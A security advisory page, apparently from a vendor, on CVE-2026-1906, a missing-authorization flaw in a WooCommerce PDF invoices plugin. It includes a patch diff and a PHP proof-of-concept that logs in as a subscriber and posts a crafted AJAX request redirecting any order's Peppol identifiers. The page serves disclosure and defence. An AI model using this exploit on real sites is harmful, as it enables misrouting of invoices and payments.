What is CVE-2026-1906?

CVE-2026-1906 is a medium severity vulnerability in the PDF Invoices & Packing Slips for WooCommerce plugin. It allows authenticated users with Subscriber-level access to modify Peppol identifiers for any customer due to missing authorization checks.

How does this vulnerability work?

The vulnerability arises from the `wpo_ips_edi_save_order_customer_peppol_identifiers` AJAX action, which lacks proper capability checks. An attacker can send a request with an arbitrary `order_id` to modify Peppol identifiers, affecting order routing and potentially leading to payment disruptions.

Who is affected by this vulnerability?

Any WordPress site using the PDF Invoices & Packing Slips for WooCommerce plugin version 5.6.0 or earlier is vulnerable. Specifically, authenticated users with Subscriber-level access or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the PDF Invoices & Packing Slips plugin installed. If it is version 5.6.0 or earlier, your site is at risk. Additionally, review your user roles to identify any Subscribers or higher who could exploit the vulnerability.

How can I fix this vulnerability?

The vulnerability is patched in version 5.7.0 of the plugin. It is recommended to update the plugin to this version or later to ensure that the authorization checks are in place and prevent unauthorized modifications.

What does the CVSS score of 4.3 mean?

A CVSS score of 4.3 indicates a medium severity vulnerability. This suggests that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized access or data manipulation if exploited.

What are the potential risks of this vulnerability?

Exploitation of this vulnerability can lead to unauthorized modification of Peppol identifiers, resulting in misrouted invoices and payments. This could disrupt payment processing and potentially expose sensitive financial information to unauthorized parties.

What is a proof of concept (PoC) for this vulnerability?

The proof of concept provided demonstrates how an authenticated user can exploit the vulnerability by sending a crafted AJAX request to modify Peppol identifiers. It outlines the steps to authenticate and execute the exploit, highlighting the ease of exploitation.

How does the patch address the vulnerability?

The patch for this vulnerability adds critical authorization checks to ensure that only users with the appropriate permissions can modify Peppol identifiers. It verifies user capabilities and order ownership before allowing any modifications.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the PDF Invoices & Packing Slips plugin temporarily to prevent exploitation. Additionally, review user roles and limit access for Subscribers until the plugin can be updated.

Where can I find more information about CVE-2026-1906?

More information about CVE-2026-1906 can be found on the official CVE database and security advisories from the plugin developers. It is advisable to stay updated on security patches and best practices for WordPress plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1906: PDF Invoices & Packing Slips for WooCommerce <= 5.6.0 – Missing Authorization to Authenticated (Subscriber+) Peppol Identifier Modification (woocommerce-pdf-invoices-packing-slips)

CVE ID CVE-2026-1906

Plugin woocommerce-pdf-invoices-packing-slips

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 5.6.0

Patched Version 5.7.0

Disclosed February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1906:
The PDF Invoices & Packing Slips for WooCommerce plugin contains a missing authorization vulnerability. The `wpo_ips_edi_save_order_customer_peppol_identifiers` AJAX handler fails to verify user permissions and order ownership. This allows authenticated attackers with Subscriber-level access to modify Peppol/EDI endpoint identifiers for any customer, affecting order routing and payment processing.

Atomic Edge research identifies the root cause in the `ajax_edi_save_order_customer_peppol_identifiers` function within `/includes/Admin.php`. The function performs a nonce check but lacks capability verification and order ownership validation. The vulnerable code accepts an `order_id` parameter directly from user input without confirming the current user has permission to edit that specific order. The function proceeds to call `wpo_ips_edi_peppol_save_customer_identifiers` with the customer ID derived from the arbitrary order.

Exploitation requires an authenticated WordPress user with Subscriber privileges or higher. Attackers send a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `wpo_ips_edi_save_order_customer_peppol_identifiers`. The request must include a valid nonce, which Subscribers can obtain, and an `order_id` parameter specifying any target order. The `values` parameter contains the malicious Peppol identifier data to inject.

The patch adds two critical authorization checks. First, it verifies `current_user_can(‘edit_shop_orders’)` before processing. Second, it validates `current_user_can(‘edit_post’, $order->get_id())` to ensure the user has permission to edit the specific order. The patch also adds proper HTTP status codes (403, 400, 404) to error responses and sanitizes the `values` parameter as an array.

Successful exploitation allows attackers to modify Peppol endpoint identifiers (`peppol_endpoint_id`, `peppol_endpoint_eas`) for any customer. This can redirect invoices and payments through the Peppol network to attacker-controlled endpoints. The vulnerability causes payment disruptions, invoice misrouting, and potential leakage of sensitive financial data to unauthorized parties.

Differential between vulnerable and patched code

Code Diff

--- a/woocommerce-pdf-invoices-packing-slips/edi/Abstracts/AbstractHandler.php
+++ b/woocommerce-pdf-invoices-packing-slips/edi/Abstracts/AbstractHandler.php
@@ -107,6 +107,7 @@


 		$mapping = apply_filters( 'wpo_ips_edi_payment_means_code_mapping', array(
+			'cheque'  => '20', // Cheque
 			'bacs'    => '58', // SEPA Credit Transfer
 			'paypal'  => '68', // Online payment
 			'stripe'  => '54', // Credit card
@@ -141,9 +142,10 @@
 			case 'stripe':
 				$data['transaction_id'] = $order->get_meta( '_stripe_source_id', true );
 				break;
+
 		}

-		return $data;
+		return apply_filters( 'wpo_ips_edi_payment_means_data', $data, $method_id, $order, $this );
 	}

 	/**
--- a/woocommerce-pdf-invoices-packing-slips/edi/Syntaxes/Cii/Handlers/SupplyChainTradeTransaction/IncludedSupplyChainTradeLineItemHandler.php
+++ b/woocommerce-pdf-invoices-packing-slips/edi/Syntaxes/Cii/Handlers/SupplyChainTradeTransaction/IncludedSupplyChainTradeLineItemHandler.php
@@ -138,8 +138,8 @@

 			$quantity_value = $parts['qty'];

-			// Use Woo’s net_total for the line total amount.
-			$net_line_total_f = (float) $this->format_decimal( $parts['net_total'], 2 );
+			// Compute line net amount from the same unit price we emit in ChargeAmount
+			$net_line_total_f = (float) $this->format_decimal( $net_unit_f * $quantity_value, 2 );
 			$net_line_total   = $this->format_decimal( $net_line_total_f, 2 );

 			$line_item = array(
--- a/woocommerce-pdf-invoices-packing-slips/edi/Syntaxes/Ubl/Handlers/LineHandler.php
+++ b/woocommerce-pdf-invoices-packing-slips/edi/Syntaxes/Ubl/Handlers/LineHandler.php
@@ -185,8 +185,8 @@
 				$quantity_value = -abs( $quantity_value );
 			}

-			// Use Woo’s net_total for the line extension amount.
-			$net_line_total = $this->format_decimal( $parts['net_total'], 2 );
+			// Compute line net amount from the same unit price we emit in PriceAmount
+			$net_line_total = $this->format_decimal( $net_unit_f * $quantity_value, 2 );

 			$line = array(
 				'name'  => "cac:{$root_element}Line",
--- a/woocommerce-pdf-invoices-packing-slips/includes/Admin.php
+++ b/woocommerce-pdf-invoices-packing-slips/includes/Admin.php
@@ -894,41 +894,69 @@
 	 * @return void
 	 */
 	public function ajax_edi_save_order_customer_peppol_identifiers(): void {
+		// Nonce check.
 		if ( ! check_ajax_referer( 'generate_wpo_wcpdf', 'security', false ) ) {
-			wp_send_json_error( array(
-				'message' => __( 'Invalid security token.', 'woocommerce-pdf-invoices-packing-slips' )
-			) );
+			wp_send_json_error(
+				array(
+					'message' => __( 'Invalid security token.', 'woocommerce-pdf-invoices-packing-slips' ),
+				)
+			);
+		}
+
+		// Authorization.
+		if ( ! current_user_can( 'edit_shop_orders' ) ) {
+			wp_send_json_error(
+				array(
+					'message' => __( 'You do not have permission to perform this action.', 'woocommerce-pdf-invoices-packing-slips' ),
+				),
+				403
+			);
 		}

 		$request  = stripslashes_deep( $_POST );
 		$order_id = isset( $request['order_id'] ) ? absint( $request['order_id'] ) : 0;
-		$values   = isset( $request['values'] ) ? $request['values'] : array();
+		$values   = isset( $request['values'] ) && is_array( $request['values'] ) ? $request['values'] : array();

-		if ( empty( $order_id ) || empty( $values ) ) {
-			wp_send_json_error( array(
-				'message' => __( 'Invalid order ID or values.', 'woocommerce-pdf-invoices-packing-slips' )
-			) );
+		if ( ! $order_id || empty( $values ) ) {
+			wp_send_json_error(
+				array(
+					'message' => __( 'Invalid order ID or values.', 'woocommerce-pdf-invoices-packing-slips' ),
+				),
+				400
+			);
 		}

 		$order = wc_get_order( $order_id );

 		if ( ! $order ) {
-			wp_send_json_error( array(
-				'message' => __( 'Order not found.', 'woocommerce-pdf-invoices-packing-slips' )
-			) );
+			wp_send_json_error(
+				array(
+					'message' => __( 'Order not found.', 'woocommerce-pdf-invoices-packing-slips' ),
+				),
+				404
+			);
 		}

-		$customer_id = is_callable( array( $order, 'get_customer_id' ) )
-			? $order->get_customer_id()
-			: 0;
+		// Ensure the current user can edit this order in admin.
+		if ( ! current_user_can( 'edit_post', $order->get_id() ) ) {
+			wp_send_json_error(
+				array(
+					'message' => __( 'You do not have permission to edit this order.', 'woocommerce-pdf-invoices-packing-slips' ),
+				),
+				403
+			);
+		}

-		wpo_ips_edi_peppol_save_customer_identifiers( $customer_id, $values );
+		$customer_id = is_callable( array( $order, 'get_customer_id' ) ) ? (int) $order->get_customer_id() : 0;

+		wpo_ips_edi_peppol_save_customer_identifiers( $customer_id, $values );
 		wpo_ips_edi_maybe_save_order_peppol_data( $order, $values );

-		wp_send_json_success( array(
-			'message' => __( 'Peppol identifiers saved successfully.', 'woocommerce-pdf-invoices-packing-slips' ),
-		) );
+		wp_send_json_success(
+			array(
+				'message' => __( 'Peppol identifiers saved successfully.', 'woocommerce-pdf-invoices-packing-slips' ),
+			)
+		);
 	}

 	public function data_input_box_content( $post_or_order_object ) {
--- a/woocommerce-pdf-invoices-packing-slips/woocommerce-pdf-invoices-packingslips.php
+++ b/woocommerce-pdf-invoices-packing-slips/woocommerce-pdf-invoices-packingslips.php
@@ -4,14 +4,14 @@
  * Requires Plugins:     woocommerce
  * Plugin URI:           https://wpovernight.com/downloads/woocommerce-pdf-invoices-packing-slips-bundle/
  * Description:          Create, print & email PDF or Electronic Invoices & PDF Packing Slips for WooCommerce orders.
- * Version:              5.6.0
+ * Version:              5.7.0
  * Author:               WP Overnight
  * Author URI:           https://www.wpovernight.com
  * License:              GPLv2 or later
  * License URI:          https://opensource.org/licenses/gpl-license.php
  * Text Domain:          woocommerce-pdf-invoices-packing-slips
  * WC requires at least: 3.3
- * WC tested up to:      10.4
+ * WC tested up to:      10.5
  */

 if ( ! defined( 'ABSPATH' ) ) {
@@ -22,7 +22,7 @@

 class WPO_WCPDF {

-	public $version              = '5.6.0';
+	public $version              = '5.7.0';
 	public $version_php          = '7.4';
 	public $version_woo          = '3.3';
 	public $version_wp           = '4.4';
--- a/woocommerce-pdf-invoices-packing-slips/wpo-ips-functions-edi.php
+++ b/woocommerce-pdf-invoices-packing-slips/wpo-ips-functions-edi.php
@@ -126,7 +126,7 @@
 	if ( ! wpo_ips_edi_peppol_is_available() ) {
 		return; // only save for Peppol formats
 	}
-
+
 	$identifier     = '';
 	$scheme         = '';
 	$save_meta_data = false;
@@ -148,12 +148,12 @@
 			$identifier = $raw;
 		}
 	}
-
+
 	if ( empty( $identifier ) || empty( $scheme ) ) {
 		$customer_id = is_callable( array( $order, 'get_customer_id' ) )
 			? $order->get_customer_id()
 			: 0;
-
+
 		if ( $customer_id <= 0 ) {
 			return;
 		}
@@ -175,7 +175,7 @@
 	if ( ! $save_meta_data ) {
 		return;
 	}
-
+
 	$order->save_meta_data();
 }

@@ -780,7 +780,7 @@
 	if ( $user_id <= 0 ) {
 		return;
 	}
-
+
 	$mode = wpo_ips_edi_peppol_identifier_input_mode();

 	// [ text‑field , scheme‑field ]
@@ -877,13 +877,23 @@
 		return '';
 	}

+	$atts = apply_filters(
+		'wpo_ips_edi_generate_action_button_html_atts',
+		array(
+			'url'   => $url,
+			'class' => $class,
+			'label' => $label,
+			'icon'  => $icon,
+		)
+	);
+
 	return sprintf(
 		'<a href="%1$s" class="%2$s" alt="%3$s" title="%3$s">
 			<span class="dashicons %4$s"></span>
 		</a>',
-		esc_url( $url ),
-		esc_attr( $class ),
-		esc_attr( $label ),
-		esc_attr( $icon )
+		esc_url( $atts['url'] ),
+		esc_attr( $atts['class'] ),
+		esc_attr( $atts['label'] ),
+		esc_attr( $atts['icon'] )
 	);
 }

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1906 - PDF Invoices & Packing Slips for WooCommerce <= 5.6.0 - Missing Authorization to Authenticated (Subscriber+) Peppol Identifier Modification

<?php

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Step 1: Authenticate to obtain session cookies and nonce
$login_url = 'https://vulnerable-site.com/wp-login.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => 'https://vulnerable-site.com/wp-admin/',
    'testcookie' => '1'
]));
$response = curl_exec($ch);

// Step 2: Load admin page to extract the nonce
// The nonce is generated with 'generate_wpo_wcpdf' action
curl_setopt($ch, CURLOPT_URL, 'https://vulnerable-site.com/wp-admin/edit.php?post_type=shop_order');
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Extract nonce from page (simplified - actual implementation would parse HTML)
// Nonce appears in JavaScript or data attributes as 'generate_wpo_wcpdf'
$nonce = 'EXTRACTED_NONCE'; // Replace with actual extraction logic

// Step 3: Exploit the vulnerable AJAX endpoint
$order_id = 123; // Target any existing order ID
$malicious_values = [
    'peppol_endpoint_id' => 'attacker-controlled-endpoint',
    'peppol_endpoint_eas' => '9999'
];

$post_data = [
    'action' => 'wpo_ips_edi_save_order_customer_peppol_identifiers',
    'security' => $nonce,
    'order_id' => $order_id,
    'values' => $malicious_values
];

curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
$response = curl_exec($ch);

// Check for success response
if (strpos($response, 'Peppol identifiers saved successfully') !== false) {
    echo "Exploit successful: Modified Peppol identifiers for order $order_idn";
} else {
    echo "Exploit failed. Response: $responsen";
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-1906?
Overview of the vulnerability
CVE-2026-1906 is a medium severity vulnerability in the PDF Invoices & Packing Slips for WooCommerce plugin. It allows authenticated users with Subscriber-level access to modify Peppol identifiers for any customer due to missing authorization checks.
How does this vulnerability work?
Mechanics of the exploitation
The vulnerability arises from the `wpo_ips_edi_save_order_customer_peppol_identifiers` AJAX action, which lacks proper capability checks. An attacker can send a request with an arbitrary `order_id` to modify Peppol identifiers, affecting order routing and potentially leading to payment disruptions.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the PDF Invoices & Packing Slips for WooCommerce plugin version 5.6.0 or earlier is vulnerable. Specifically, authenticated users with Subscriber-level access or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps to verify vulnerability status
To check if your site is vulnerable, verify the version of the PDF Invoices & Packing Slips plugin installed. If it is version 5.6.0 or earlier, your site is at risk. Additionally, review your user roles to identify any Subscribers or higher who could exploit the vulnerability.
How can I fix this vulnerability?
Steps to mitigate the issue
The vulnerability is patched in version 5.7.0 of the plugin. It is recommended to update the plugin to this version or later to ensure that the authorization checks are in place and prevent unauthorized modifications.
What does the CVSS score of 4.3 mean?
Understanding the risk level
A CVSS score of 4.3 indicates a medium severity vulnerability. This suggests that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized access or data manipulation if exploited.
What are the potential risks of this vulnerability?
Consequences of exploitation
Exploitation of this vulnerability can lead to unauthorized modification of Peppol identifiers, resulting in misrouted invoices and payments. This could disrupt payment processing and potentially expose sensitive financial information to unauthorized parties.
What is a proof of concept (PoC) for this vulnerability?
Demonstration of the exploit
The proof of concept provided demonstrates how an authenticated user can exploit the vulnerability by sending a crafted AJAX request to modify Peppol identifiers. It outlines the steps to authenticate and execute the exploit, highlighting the ease of exploitation.
How does the patch address the vulnerability?
Details of the security fix
The patch for this vulnerability adds critical authorization checks to ensure that only users with the appropriate permissions can modify Peppol identifiers. It verifies user capabilities and order ownership before allowing any modifications.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the PDF Invoices & Packing Slips plugin temporarily to prevent exploitation. Additionally, review user roles and limit access for Subscribers until the plugin can be updated.
Where can I find more information about CVE-2026-1906?
Resources for further reading
More information about CVE-2026-1906 can be found on the official CVE database and security advisories from the plugin developers. It is advisable to stay updated on security patches and best practices for WordPress plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations